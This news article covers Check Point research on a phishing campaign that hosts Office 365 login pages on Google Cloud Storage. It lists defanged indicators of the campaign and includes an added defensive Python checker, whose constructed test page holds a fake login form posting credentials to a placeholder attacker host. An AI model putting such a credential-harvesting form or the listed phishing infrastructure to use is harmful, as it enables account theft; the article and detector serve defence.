A lie is best concealed between two truths, an old saying goes, and it seems hackers are using this wisdom to better hide their phishing efforts.
Cybersecurity researchers from Check Point are warning of a phishing campaign that abuses Google Cloud Services and offers legitimate PDF whitepapers to victims who give away their login credentials.
According to the researchers, it all starts with a PDF document uploaded to Google Drive, containing a link to a phishing page. The landing page, hosted on storage.googleapis[.]com/sharepoint-unwearied-439052791/index.html, requires the user to log in with their Office 365 or organization email.
After the victim gives away their login credentials, they are redirected to a genuine PDF report published by a “renowned global consulting firm.”
Since the phishing page is hosted on Google Cloud Storage, “the user never becomes suspicious,” claims Check Point. Upon further inspection, however, it is easy to see that most of the resources are loaded from prvtsmtp[.]com, a Ukrainian website.
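The tell described above, a login page on shared cloud storage whose resources come from an unrelated host, can be checked mechanically. The following is an added example, not code from Check Point or the original article; the bucket name, the `assets.phish.example` host and the `audit_page` helper are constructed placeholders, and the check also covers form targets, which goes slightly beyond the resources the article mentions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts where any tenant can publish pages under the provider's domain and certificate.
SHARED_HOSTING = {"storage.googleapis.com"}  # assumption: extend per provider
URL_ATTRS = {"script": "src", "img": "src", "iframe": "src", "link": "href", "form": "action"}

class ResourceCollector(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.has_password_field = False
        self.resources = []  # (tag, absolute URL) for every sub-resource and form target

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password_field = True
        attr = URL_ATTRS.get(tag)
        if attr and attrs.get(attr):
            # Resolve relative references against the page URL before comparing hosts.
            self.resources.append((tag, urljoin(self.page_url, attrs[attr])))

def audit_page(page_url, html):
    """Report hosts other than the page's own that it loads from or posts to."""
    page_host = urlsplit(page_url).hostname
    collector = ResourceCollector(page_url)
    collector.feed(html)
    foreign = {}
    for tag, url in collector.resources:
        host = urlsplit(url).hostname  # None for data:/javascript: URLs
        if host and host != page_host:
            foreign.setdefault(host, set()).add(tag)
    return {
        "foreign_hosts": {h: sorted(t) for h, t in foreign.items()},
        "credential_form": collector.has_password_field,
        "suspicious": page_host in SHARED_HOSTING
        and collector.has_password_field and bool(foreign),
    }

# Constructed sample: bucket name and assets.phish.example are placeholders.
SAMPLE_URL = "https://storage.googleapis.com/constructed-bucket/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://assets.phish.example/login.css">
<script src="https://assets.phish.example/app.js"></script></head><body>
<img src="logo.png">
<form action="https://assets.phish.example/post.php" method="post">
<input type="email" name="user"><input type="password" name="pass"></form>
</body></html>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE_URL, SAMPLE_HTML))
```

A mail gateway or proxy that already fetches linked pages could run a check like this on the retrieved HTML and raise an alert when `suspicious` is true.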
“Hackers are swarming around the cloud storage services that we rely on and trust, making it much tougher to identify a phishing attack,” said Lotem Finkelsteen, Manager of Threat Intelligence at Check Point.
“Traditional red flags of a phishing attack, such as look-alike domains or websites without certificates, won’t help us much as we enter a potential cyber pandemic. Users of Google Cloud Platform, even AWS and Azure users, should all beware of this fast-growing trend and learn how to protect themselves. It starts by thinking twice about the files you receive from senders.”